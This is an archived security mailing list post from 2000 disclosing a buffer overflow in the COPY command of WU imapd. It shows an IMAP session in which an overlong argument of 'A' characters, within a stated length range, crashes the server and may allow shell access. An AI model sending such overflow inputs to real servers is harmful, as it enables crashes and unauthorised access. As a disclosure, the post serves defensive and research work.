OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
Subject: another WU imapd buffer overflow
From: Michal Szymanski (siva9CLICO.PL)
Date: Thu Apr 20 2000 - 19:12:18 CDT

Hi,

While doing code security audit, I discovered another buffer overflow in imapd.
This time security flaw exist in standard rfc 1064 COPY command:

* OK mail IMAP4rev1 v12.264 server ready
* login siva9 secret
* OK LOGIN completed
* select inbox
* 2 EXISTS
* 0 RECENT
* OK [UIDVALIDITY 956162550] UID validity status
* OK [UIDNEXT 5] Predicted next UID
* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
* OK [PERMANENTFLAGS (\* \Answered \Flagged \Deleted \Draft \Seen)] Permanent
* flags
* OK [UNSEEN 2] first unseen message in /var/spool/mail/siva9
* OK [READ-WRITE] SELECT completed
* copy 1 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA ... [a lot of A's]

No answer. Process has been killed by SIGSEGV. Number of A's must be in
range from 1017 to 8180. After LOGIN all privileges are dropped, but we still
have possibility to get unprivileged shell access. I've tested it against WU
imapd v10.223, v11.241, v12.250, v12.261, and v12.264.

Regards,

Michal Szymanski [michal_szymanskilinux.com.pl];